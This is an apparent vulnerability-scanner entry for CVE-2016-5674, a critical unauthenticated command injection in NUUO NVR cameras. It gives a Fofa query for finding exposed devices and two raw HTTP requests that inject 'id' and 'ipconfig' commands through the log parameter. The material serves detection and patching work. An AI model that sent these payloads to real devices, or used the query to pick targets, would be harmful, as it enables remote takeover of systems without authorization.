| Title | NUUO NVR camera `debugging_center_utils_.php` - Command Execution |
|---|---|
| Author | DhiyaneshDK |
| Severity | Critical |
| Impact | Attackers can execute arbitrary PHP code remotely without authentication through command injection, leading to complete server compromise and data breach. |
| Remediation | Update NUUO NVR devices to the latest firmware version that patches the command injection vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.89376 |
| CVE ID | CVE-2016-5674 |
| CWE ID | CWE-20 |
| Fofa Query | app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login"app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login" |
| Tags | cve cve2016 nuuo rce netgear vkev vuln |
debugging_center_utils_.php in NUUO NVRmini 2 1.7.5 through 3.0.0, NUUO NVRsolo 1.7.5 through 3.0.0, and NETGEAR ReadyNAS Surveillance 1.1.1 through 1.4.1 allows remote attackers to execute arbitrary PHP code via the log parameter.
GET /__debugging_center_utils___.php?log=;echo%20fdscanimldbfibbbzipxxzvvgpnqoirq%20|%20id HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /__debugging_center_utils___.php?log=;echo%20fdscanimldbfibbbzipxxzvvgpnqoirq%20|%20ipconfig HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-5674.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-5674.pcap
N/AN/A